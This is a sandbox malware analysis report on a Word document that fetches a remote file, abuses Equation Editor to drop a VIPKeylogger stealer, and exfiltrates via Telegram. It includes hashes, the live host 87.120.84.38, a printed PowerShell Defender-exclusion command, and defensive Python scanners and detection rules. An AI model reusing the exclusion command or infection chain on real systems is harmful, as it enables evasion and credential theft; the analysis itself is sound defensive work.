Malware Analysis Report

2024-11-13 15:35

Sample ID 241022-1zdl4sydrm
Target 30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1
SHA256 30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1
Tags
vipkeylogger collection discovery execution keylogger spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1

Threat Level: Known bad

The file 30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1 is a Word OpenXML document (.docx) and was found to be: Known bad.

Observed chain (behavioral1, Windows 7 with Office 14): the document pulls a .doc from an external location over plain HTTP (cached locally as 7vbu8ZW8lFI8mn5[1].doc; 87.120.84.38:80 is the only HTTP destination in the run). Word then launches Equation Editor (EQNEDT32.EXE, started via COM with -Embedding), which writes and executes C:\Users\Admin\AppData\Roaming\rekigobi34567.exe (the "Downloads MZ/PE file" signature indicates the PE came over the network rather than out of the document). That executable runs PowerShell to add a Microsoft Defender exclusion for its own path, starts a second copy of itself and writes into it before changing its thread context (WriteProcessMemory followed by SetThreadContext, the injection step), then reads Outlook profile keys and web-browser data, looks up the host's external IP (checkip.dyndns.org, reallyfreegeoip.org) and connects to api.telegram.org over TLS, the Telegram Bot API endpoint used for exfiltration. On Windows 10 with Office 16 (behavioral2) only the external .doc download occurred: no EQNEDT32.EXE was started and no payload ran.

Malicious Activity Summary

vipkeylogger collection discovery execution keylogger spyware stealer

VIPKeylogger

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Reads user/profile data of local email clients

Abuses OpenXML format to download file from external location

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Checks processor information in registry

Uses Volume Shadow Copy service COM API

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious behavior: AddClipboardFormatListener

outlook_win_path

Launches Equation Editor

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-22 22:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-22 22:04

Reported

2024-10-22 22:06

Platform

win7-20240903-en

Max time kernel

59s

Max time network

31s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1.docx"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 484 set thread context of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2676 wrote to memory of 484 (4 identical events) N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 3012 wrote to memory of 1760 (4 identical events) N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 484 wrote to memory of 2236 (4 identical events) N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 484 wrote to memory of 3004 (9 identical events) N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe

Note: four writes from a parent into a child it has just started is the pattern this run shows for every ordinary process start, including WINWORD.EXE into splwow64.exe (the print-spooler helper that 64-bit Windows starts for 32-bit Office), which is benign. The nine writes from 484 into its own child 3004, together with the SetThreadContext event above, are the injection step.

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
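The "Abuses OpenXML format to download file from external location" signature above fires because a .docx is a ZIP of XML parts, and a relationship part (.rels) can point a part such as the attached template at an external URL that Word fetches when the document opens. The check below is an added example, not the sandbox's own logic: it builds a minimal .docx in memory (constructed, not the analysed sample; the template URL 203.0.113.5 is a documentation placeholder) and scans every .rels part for TargetMode="External" relationships, rating the kinds Word resolves automatically higher than a plain hyperlink.

```python
"""Scan a Word OpenXML package for external relationships (remote template,
external OLE object, frame, subdocument, image). Added example, not the
sandbox's own check. The .docx built here is constructed in memory and the
template URL is a placeholder, not an indicator from this sample."""
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Relationship kinds Word resolves on open without user interaction.
# A hyperlink is also External but only fires on click, so it rates lower.
AUTO_LOAD_KINDS = {"attachedTemplate", "oleObject", "frame", "subDocument", "image"}


def find_external_relationships(docx_bytes: bytes) -> list:
    """Every TargetMode="External" relationship in any .rels part of the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                kind = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "kind": kind,
                    "target": rel.get("Target"),
                    "severity": "high" if kind in AUTO_LOAD_KINDS else "low",
                })
    return findings


def build_docx(template_url: str = "") -> bytes:
    """Construct a minimal .docx. With template_url set, word/settings.xml
    carries an attachedTemplate whose relationship is External, which is
    how a remote template is wired in; without it the package is clean."""
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
        '</Types>')
    root_rels = (f'<Relationships xmlns="{PKG_REL_NS}">'
                 f'<Relationship Id="rId1" Type="{OFFICE_REL_NS}/officeDocument" Target="word/document.xml"/>'
                 '</Relationships>')
    document = (f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>constructed sample</w:t>'
                '</w:r></w:p></w:body></w:document>')
    document_rels = (f'<Relationships xmlns="{PKG_REL_NS}">'
                     f'<Relationship Id="rId1" Type="{OFFICE_REL_NS}/settings" Target="settings.xml"/>'
                     '</Relationships>')
    template_ref = '<w:attachedTemplate r:id="rId1"/>' if template_url else ""
    settings = f'<w:settings xmlns:w="{W_NS}" xmlns:r="{OFFICE_REL_NS}">{template_ref}</w:settings>'
    template_rel = (f'<Relationship Id="rId1" Type="{OFFICE_REL_NS}/attachedTemplate" '
                    f'Target="{template_url}" TargetMode="External"/>') if template_url else ""
    settings_rels = f'<Relationships xmlns="{PKG_REL_NS}">{template_rel}</Relationships>'

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("clean", build_docx()),
                       ("remote template", build_docx("http://203.0.113.5/template.dotm"))):
        print(label, find_external_relationships(doc))
```

Run the same scanner over a real sample by reading the .docx bytes from disk and passing them to find_external_relationships; a high-severity hit in word/_rels/settings.xml.rels is the remote-template case, while an external oleObject in word/_rels/document.xml.rels is the shape that pulls in an embedded object such as an Equation Editor payload.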

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1.docx"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\rekigobi34567.exe

"C:\Users\Admin\AppData\Roaming\rekigobi34567.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rekigobi34567.exe"

(The command line names System32 but the image that ran is the SysWOW64 copy: the parent rekigobi34567.exe is 32-bit, so WOW64 file-system redirection applies. Add-MpPreference -ExclusionPath excludes the payload's own path from Microsoft Defender scanning; on a suspect host, Get-MpPreference | Select-Object ExclusionPath shows whether such an exclusion is present.)

C:\Users\Admin\AppData\Roaming\rekigobi34567.exe

"C:\Users\Admin\AppData\Roaming\rekigobi34567.exe"
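The process list above is the chain a detection rule should catch. The following is an added example, not the sandbox's own detection logic: it runs four rules over a constructed event log whose image paths, command lines and PIDs are taken from this report. Parent PIDs are not in the report, so they are assumptions: WINWORD.EXE's parent (PID 2000) and EQNEDT32.EXE's parent (PID 900, a DcomLaunch svchost.exe) are made up, the rest follow from the WriteProcessMemory table. The sample file name in the Word command line is shortened.

```python
"""Process-tree rules for the chain in this run. Added example, not the
sandbox's own logic; parent PIDs 2000 and 900 are assumptions."""
import ntpath
import re

OFFICE14 = r"C:\Program Files (x86)\Microsoft Office\Office14"
EQN = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
PAYLOAD = r"C:\Users\Admin\AppData\Roaming\rekigobi34567.exe"
PS_RUN = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed event log (image paths and command lines from the report).
EVENTS = [
    {"pid": 3012, "ppid": 2000, "image": OFFICE14 + r"\WINWORD.EXE",
     "cmdline": f'"{OFFICE14}\\WINWORD.EXE" /n "C:\\Users\\Admin\\AppData\\Local\\Temp\\sample.docx"'},
    {"pid": 1760, "ppid": 3012, "image": r"C:\Windows\splwow64.exe",
     "cmdline": r"C:\Windows\splwow64.exe 12288"},
    # "-Embedding" means COM activation: the parent is svchost.exe, not Word,
    # so a plain WINWORD -> EQNEDT32 parent/child rule would never fire.
    {"pid": 2676, "ppid": 900, "image": EQN, "cmdline": f'"{EQN}" -Embedding'},
    {"pid": 484, "ppid": 2676, "image": PAYLOAD, "cmdline": f'"{PAYLOAD}"'},
    {"pid": 2236, "ppid": 484, "image": PS_RUN,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rekigobi34567.exe"'},
    {"pid": 3004, "ppid": 484, "image": PAYLOAD, "cmdline": f'"{PAYLOAD}"'},
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Temp\\", re.IGNORECASE)
EXCLUSION = re.compile(r"Add-MpPreference\b.*?-ExclusionPath\s+(?:\"([^\"]+)\"|(\S+))", re.IGNORECASE)


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events: list) -> list:
    """Return one finding per matched rule: {'rule', 'pid', 'detail'}."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = image_name(parent["image"]) if parent else ""
        # Equation Editor is a retired component; any start of it merits an alert.
        if name == "eqnedt32.exe":
            findings.append({"rule": "equation_editor_started", "pid": e["pid"], "detail": e["cmdline"]})
        # Equation Editor starting an executable from a user-writable location.
        if parent_name == "eqnedt32.exe" and USER_WRITABLE.search(e["image"]):
            findings.append({"rule": "eqnedt32_spawned_dropped_exe", "pid": e["pid"], "detail": e["image"]})
        # Defender exclusion added from the command line (defense evasion).
        m = EXCLUSION.search(e["cmdline"])
        if m:
            findings.append({"rule": "defender_exclusion_added", "pid": e["pid"],
                             "detail": m.group(1) or m.group(2)})
        # A user-directory binary starting a copy of itself is the shape of
        # self-injection; corroborate with SetThreadContext/WriteProcessMemory.
        if parent and parent_name == name and USER_WRITABLE.search(e["image"]):
            findings.append({"rule": "same_image_child_from_user_dir", "pid": e["pid"], "detail": e["image"]})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['rule']:<32} pid={f['pid']:<5} {f['detail']}")
```

The splwow64.exe child of WINWORD.EXE matches none of the rules, which is the intended outcome: that process is normal for 32-bit Office on 64-bit Windows. The first rule deliberately ignores the parent, because COM-activated EQNEDT32.EXE is never a direct child of Word.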

Network

Country Destination Domain Proto
DE 87.120.84.38:80 87.120.84.38 tcp (3 connections)
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Note: 87.120.84.38 is contacted by raw IP (no DNS lookup) over plain HTTP and is the only such host, so it is where the external .doc and the dropped PE are served from. checkip.dyndns.org and reallyfreegeoip.org are public IP and geolocation lookups the payload uses to tag the victim; api.telegram.org (Telegram Bot API) is the exfiltration channel. Block or alert on the IP and on outbound Telegram API traffic from non-browser processes.

Files

memory/3012-0-0x000000002F9C1000-0x000000002F9C2000-memory.dmp

memory/3012-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/3012-2-0x0000000070FAD000-0x0000000070FB8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{79E22A1C-E48D-4510-932D-BA1F0EE34C2A}

MD5 86ecabda042bad2aa9d254725cb173ea
SHA1 aea8349cc9bdb19de77bdc9dd449321dfe049e7c
SHA256 9189af240de3977e7bd77259097eaef3da761ae4b3a086c76008e50d3cc1bf26
SHA512 660b4d56330e65ae8667345164825eef5425125d8dcbcb727417de379f0e5d86a4ea6322eb9791f1b4b9c5a02be18c01f4f84dea0a47921676dc54d2ddc63ff5

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 2b308bb62fa318a25f41975e56a05cd6
SHA1 e4107cdafd98bb8a484ca6decfee839f0cd3ee19
SHA256 cdea8f35126837d69101ce820fc37fab3944287dcce519ef7a5600a7ab539921
SHA512 241e8a9b87b8a27a8da7b18aa913510c9afcb20b0c49e9f44d9bf97c7fb300046204bb1c576b46c82104d6b23f5af036479b9f8600605f7bd3d0675439e83cef

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\7vbu8ZW8lFI8mn5[1].doc

MD5 00c4c82a063c048c37808a72ea1f04e3
SHA1 9ab87b7393168e6a3f181524ee69c818bd70cff6
SHA256 fe6dc6138bf4bd851087fcc708493877ff458ba2da42f499ced66164e8e9dcd2
SHA512 5194e8fc20dccdec0b1b7f7a30a500a4696868646ab9adc7e8974e737ebaf2191aa0cac1bc50dbe89c6623598fcbb3505c0ff46ec9114d94aacf3caa8dfed3d1

\Users\Admin\AppData\Roaming\rekigobi34567.exe

MD5 07188bef748562cde18f2b77f76bae94
SHA1 70f3fddd3fb0030e4e7422a41d560374c463e1dc
SHA256 2a53872f573a1817be1848779e60c7db22501badc0afd7f364ee30a77dce3395
SHA512 fab75b7746af8b04bda1361737d47e33bb770be79872830722bf4affe2231d222c01032f73f48d92268027a20e0eb230c7c8ff3a94b6813b2ce4dd445e6ddf94

memory/484-94-0x0000000000A10000-0x0000000000ACC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/3012-102-0x0000000070FAD000-0x0000000070FB8000-memory.dmp

memory/484-103-0x00000000004C0000-0x00000000004DC000-memory.dmp

memory/484-104-0x0000000005230000-0x00000000052BA000-memory.dmp

memory/3004-116-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-118-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-114-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-113-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/3004-111-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-109-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-107-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-105-0x0000000000400000-0x0000000000448000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-22 22:04

Reported

2024-10-22 22:06

Platform

win10v2004-20241007-en

Max time kernel

51s

Max time network

43s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1.docx" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

(WINWORD.EXE is the only process in this run, so the persistence and ransomware tags above reflect Word's own use of these interfaces, not payload activity. No EQNEDT32.EXE was started on this Windows 10 / Office 16 image, consistent with Equation Editor having been removed from Office in 2018, so the chain stopped after the external .doc download.)

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1.docx" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 133.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
DE 87.120.84.38:80 87.120.84.38 tcp (2 connections)
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 38.84.120.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.27.153:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 139.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp (32 connections)
US 8.8.8.8:53 153.27.18.2.in-addr.arpa udp

Note: the only non-Microsoft destination is 87.120.84.38:80, the same host as in behavioral1 (the 38.84.120.87.in-addr.arpa query is its reverse lookup). Everything else is Office 16 roaming/template CDN traffic and reverse lookups of those addresses, so this run shows the external .doc fetch and nothing further.

Files

memory/2712-0-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-1-0x00007FF9EDC8D000-0x00007FF9EDC8E000-memory.dmp

memory/2712-3-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-4-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-2-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-6-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-5-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-7-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-9-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-12-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-11-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-10-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-13-0x00007FF9AB3F0000-0x00007FF9AB400000-memory.dmp

memory/2712-8-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-14-0x00007FF9AB3F0000-0x00007FF9AB400000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VKYZDMA5\7vbu8ZW8lFI8mn5[1].doc

MD5 00c4c82a063c048c37808a72ea1f04e3
SHA1 9ab87b7393168e6a3f181524ee69c818bd70cff6
SHA256 fe6dc6138bf4bd851087fcc708493877ff458ba2da42f499ced66164e8e9dcd2
SHA512 5194e8fc20dccdec0b1b7f7a30a500a4696868646ab9adc7e8974e737ebaf2191aa0cac1bc50dbe89c6623598fcbb3505c0ff46ec9114d94aacf3caa8dfed3d1

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 d0969496f22839aca2df225cf2f94e32
SHA1 853a7239899684c34322e79c113dbcb2bcb1f6bc
SHA256 e2612049559fa09c8a122336a0440051d670967a8764ee9f5cbba901a91ee444
SHA512 22ea5f47507f63a76df881e139b7140b23581af439b31f12c34bdde2bcbfb0c6b03958d8ff8f8a72357f7316e36bbeea62c9c03c982de1f8a55b625f4f61f543

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
